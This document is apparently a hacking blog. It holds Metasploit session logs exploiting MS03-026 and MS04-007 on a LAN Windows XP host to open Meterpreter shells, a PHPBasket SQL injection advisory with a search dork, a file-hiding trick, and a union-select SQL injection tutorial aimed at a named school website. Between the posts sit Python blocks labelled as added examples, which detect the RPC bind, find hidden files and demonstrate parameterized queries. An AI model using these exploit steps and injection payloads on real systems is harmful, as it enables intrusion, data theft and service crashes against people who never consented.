This is an old exploit, but it still works.
I have tested it on the Local Area Network here.
This exploit was tested on Windows XP Service Pack 1.
[o] DCOM RPC Exploit (ms03_026_dcom)
# Description
This module exploits a stack overflow in the RPCSS service; this
vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)
root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms
root@ubuntu:~# nmap -O -PN 172.16.1.31
Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
5000/tcp open  upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds
root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole
=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options
Module options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options
Module options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.31      yes       The target address
   RPORT  135              yes       The target port
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
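As an added example (not from the post or from Metasploit), the Python below parses the DCE/RPC bind that precedes the exploit, the "Binding to 4d9f4ab8-..." step in the session above, and flags binds to that interface (IRemoteActivation, the DCOM activation interface MS03-026 patched) on tcp/135, which is what a network sensor watches for in front of unpatched Windows 2000/XP hosts. It assumes little-endian data representation and builds its own sample bind PDU as input; the alert policy is illustrative.

```python
import struct
import uuid

# Interface the session above binds to before sending the exploit:
# IRemoteActivation, the DCOM activation interface targeted by MS03-026.
IREMOTEACTIVATION = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # standard NDR transfer syntax
PTYPE_BIND = 11

def bind_interfaces(pdu):
    """Abstract-syntax UUIDs requested by a DCE/RPC v5 bind PDU.
    Assumes little-endian data representation (what Windows clients send)."""
    if len(pdu) < 28 or pdu[0] != 5 or pdu[2] != PTYPE_BIND:
        return []
    n_ctx = pdu[24]          # after the 16-byte header: max_xmit, max_recv, assoc_group
    off, found = 28, []
    for _ in range(n_ctx):
        if off + 24 > len(pdu):
            break
        n_tsyn = pdu[off + 2]                      # transfer syntaxes offered for this context
        found.append(uuid.UUID(bytes_le=pdu[off + 4:off + 20]))
        off += 24 + 20 * n_tsyn                    # cont id/flags + abstract syntax + transfer syntaxes
    return found

def alert_for(src_ip, dst_port, pdu):
    """Illustrative policy: any bind to the activation interface on the
    endpoint-mapper port is worth an alert on networks with unpatched hosts."""
    if dst_port == 135 and IREMOTEACTIVATION in bind_interfaces(pdu):
        return f"{src_ip} bound IRemoteActivation on tcp/135 (MS03-026 attack surface)"
    return None

def make_bind(iface, call_id=1):
    """Constructed minimal bind PDU for iface (sample input, not captured traffic)."""
    body = struct.pack("<HHI", 5840, 5840, 0) + bytes([1, 0, 0, 0])      # one context element
    body += struct.pack("<HBB", 0, 1, 0) + iface.bytes_le + struct.pack("<HH", 0, 0)  # iface v0.0
    body += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)                     # NDR v2
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 3, b"\x10\x00\x00\x00",
                      16 + len(body), 0, call_id)
    return hdr + body
```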
=============================================================================================
[o] KILLBILL SMB Exploit (ms04_007_killbill)
# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encountered when using the
equivalent bind payloads. Your mileage may vary.
msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options
Module options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  172.16.1.31      yes       The target address
   RPORT  445              yes       Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
06 June 2010
Metasploit Proof of Concept [ Linux ]
04 June 2010
PHPBasket 4.0 - SQL Injection Vulnerability
Software : PHPBasket version 4.0
Vendor : http://www.phpbasket.com/
Author : NoGe
[o] Vulnerable file
product.php
[o] Exploit
http://localhost/[path]/product.php?cat_id=[sql]
[o] Dork
"Powered by PHPBasket"
Hidden Files and Folders
How to hide files or folders in Windows without using any software?
Maybe this is an old trick, but it is still good and works :)
This trick keeps your files and folders hidden even when you have chosen "Show hidden files and folders" in Folder Options :p
Tested on Windows XP and Windows Vista Home Premium.
[x]
First, write this script and save it as open.bat
attrib -a -s -h [ folder or file to hide ]
attrib -a -s -h open.bat
attrib -a -s -h close.bat
Second, write this script and save it as close.bat
attrib +a +s +h [ folder or file to hide ]
attrib +a +s +h open.bat
attrib +a +s +h close.bat
[x]
Script explanation
attrib : displays or changes file attributes
a : archive file attribute
s : system file attribute
h : hidden file attribute
+ : sets an attribute
- : clears an attribute
attrib +a +s +h [ folder or file to hide ]
You put the name of your file or folder there.
If you hide a file, don't forget to include the file extension too.
Example:
attrib +a +s +h pic.jpg <== hides the file pic.jpg
attrib +a +s +h folderz <== hides the folder folderz
What about these two files?
attrib +a +s +h open.bat <== hides open.bat
attrib +a +s +h close.bat <== hides close.bat
attrib -a -s -h open.bat <== shows open.bat
attrib -a -s -h close.bat <== shows close.bat
Why do we put these two files into the script too?
We must hide these files too, or anyone will be able to open your hidden stuff.
If you have many folders to hide, you can add them to the script like this.
Add this to close.bat:
attrib +a +s +h folder1
attrib +a +s +h folder2
attrib +a +s +h folder3
Don't forget to add them to open.bat too:
attrib -a -s -h folder1
attrib -a -s -h folder2
attrib -a -s -h folder3
[x]
How to show it again?
You must have WinRAR to show your hidden stuff.
Open WinRAR and go to the folder or drive where you hid your stuff.
WinRAR will show all hidden files or folders, including open.bat and close.bat.
Click open.bat to show all your hidden stuff.
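As an added example (not part of the post), the Python below finds what this trick produces from the defender's side: entries carrying both the System and Hidden attributes, which Explorer keeps out of view under the separate "Hide protected operating system files" option, while attrib and dir /a list them regardless. It parses a constructed sample of attrib /S /D output and, on a Windows host, checks the same attribute bits directly; the list of well-known system S+H names is an assumption kept deliberately short.

```python
import ntpath
import os
import re
import stat

# Constructed sample of `attrib /S /D` output (not captured from a real host).
# Column positions vary between Windows versions, so the parser locates the
# path by its drive prefix instead of relying on fixed offsets.
SAMPLE_ATTRIB_OUTPUT = """\
A    SH       C:\\Users\\noge\\stuff\\open.bat
A    SH       C:\\Users\\noge\\stuff\\close.bat
A    SH       C:\\Users\\noge\\stuff\\pic.jpg
     SH       C:\\Users\\noge\\stuff\\folderz
A             C:\\Users\\noge\\stuff\\readme.txt
A    SH       C:\\pagefile.sys
"""

# Names Windows itself marks System+Hidden; expected, not findings (assumed allowlist).
KNOWN_SYSTEM_SH = {"pagefile.sys", "hiberfil.sys", "swapfile.sys", "desktop.ini"}

LINE_RE = re.compile(r"^(?P<flags>[A-Z ]*?)\s*(?P<path>[A-Za-z]:\\.*)$")

def parse_attrib(text):
    """Yield (set of attribute letters, path) for each line of attrib output."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield set(m.group("flags").replace(" ", "")), m.group("path")

def is_system_hidden(flags):
    """S+H together is the combination the open.bat/close.bat trick relies on."""
    return {"S", "H"} <= flags

def find_hidden_system(text):
    """Paths carrying S+H that are not well-known operating-system files."""
    return [p for flags, p in parse_attrib(text)
            if is_system_hidden(flags) and ntpath.basename(p).lower() not in KNOWN_SYSTEM_SH]

def scan_tree(root):
    """Same check on a live Windows host via st_file_attributes.
    On non-Windows hosts the field is absent and nothing is reported."""
    want = stat.FILE_ATTRIBUTE_SYSTEM | stat.FILE_ATTRIBUTE_HIDDEN
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                attrs = getattr(os.stat(path), "st_file_attributes", 0)
            except OSError:
                continue                      # unreadable or dangling entry
            if attrs & want == want and name.lower() not in KNOWN_SYSTEM_SH:
                hits.append(path)
    return hits
```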
02 June 2010
Simple SQL
Welcome, friend...
This is the first time I have tried to write on a blog, so if there are still many shortcomings, don't beat me up.. but if there is anything good, please donate to my bank account...:P
First I will try to explain SQL injection, but only a little, the problem is nobody has donated yet... :)
If the masters want to add something, please do....
If friends want to leave a comment, that's fine, but donate first... hehehe
OK, let's get straight to it...
1. About SQL Injection
SQL injection is a trick for injecting money (translated).. hihihi, wrong. What I mean is injecting SQL queries/commands as input, which is possible through a web page or through the URL.
Short, right?? That's why you should donate, so that I have enough money to eat and enough energy to type... hehehe. In the end I'm asking for donations again... :)
2. What is needed?
3 kg of imagination flour, 1.5 kg of creativity, 800 grams of logic, 400 grams of patience.
And most importantly, there must be an internet connection and any web browser. And don't forget 2 packs of Marlboro Mix and 1 bottle of beer. :)
3. What do we have to look for??
First we look for a cheap internet cafe (for those who don't have a laptop yet, like me), then look for a comfortable spot, not too cold and not too hot, then just sleep there.. hehehe.. a forced joke, not funny at all...
Please understand.. I'm starving right now...
Now it's getting serious, the dawn call to prayer has already sounded.. hehehe, that has nothing to do with it..
We look for a target on Google with any dork we like.
Example: site:com cilacap
That means we are looking for .com sites that contain the word cilacap.
Say we get http://sman1clp.com
We look for its id: http://sman1clp.com/index.php?cat=berita&idberita=50
Next we check whether that site is vulnerable or not..
The way to do it is to put a - sign in front of the id number.
So: http://sman1clp.com/index.php?cat=berita&idberita=-50
What happens?? Blank...
Yup, if we put a - in front of the id number and the page goes blank or an error message appears, that means the site is vulnerable.
Next we look for its column count (the "binery"). The way to do it is with the union select command.
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--
The + sign is an SQL string meaning a space; it is the same as %20. And -- can also be replaced with /*. For more about SQL strings, ask Grandpa Google.
OK, back to the topic..
After we put in the union select, what happens??
The used SELECT statements have a different number of columns
We add to the column count:
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--
It turns out it still says The used SELECT statements have a different number of columns
Keep adding until it is true and that message no longer appears.
OK, we get
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--
3
Sender : 2, [ 6]
5
What's with those numbers????
Find the answer in SQL Tutorial Part 2 hehehehehe..
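As an added example (not part of this tutorial or the PHPBasket advisory above), the Python/sqlite3 script below reproduces the pattern behind both posts on a constructed seven-column table: a numeric URL parameter such as idberita or cat_id pasted into SQL text. The -50 probe, the column-count error and the union select behave as the tutorial describes against the concatenated query, while the hardened form validates the type and binds the value, so the same input returns nothing and no database error reaches the user. Table and column names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the news table behind index.php?cat=berita&idberita=N.
    Seven columns, matching the count the tutorial arrives at."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE berita(id INTEGER, judul TEXT, isi TEXT, pengirim TEXT,
                            tgl TEXT, hits INTEGER, kat TEXT);
        INSERT INTO berita VALUES (50, 'Pengumuman', 'isi berita', 'admin',
                                   '2010-06-02', 12, 'berita');
    """)
    return con

def lookup_vulnerable(con, idberita):
    """The pattern the tutorial exploits: the URL parameter is pasted into SQL text.
    Returns the rows, or the database error text (which such pages often echo,
    and which the tutorial's column counting depends on)."""
    try:
        return con.execute("SELECT * FROM berita WHERE id=" + idberita).fetchall()
    except sqlite3.OperationalError as e:
        return str(e)

def lookup_fixed(con, idberita):
    """Hardened form: validate the type first, then bind the value as a parameter,
    so the input can never become part of the SQL text."""
    try:
        n = int(idberita)
    except ValueError:
        return []          # reject non-numeric ids before the database sees them
    return con.execute("SELECT * FROM berita WHERE id=?", (n,)).fetchall()
```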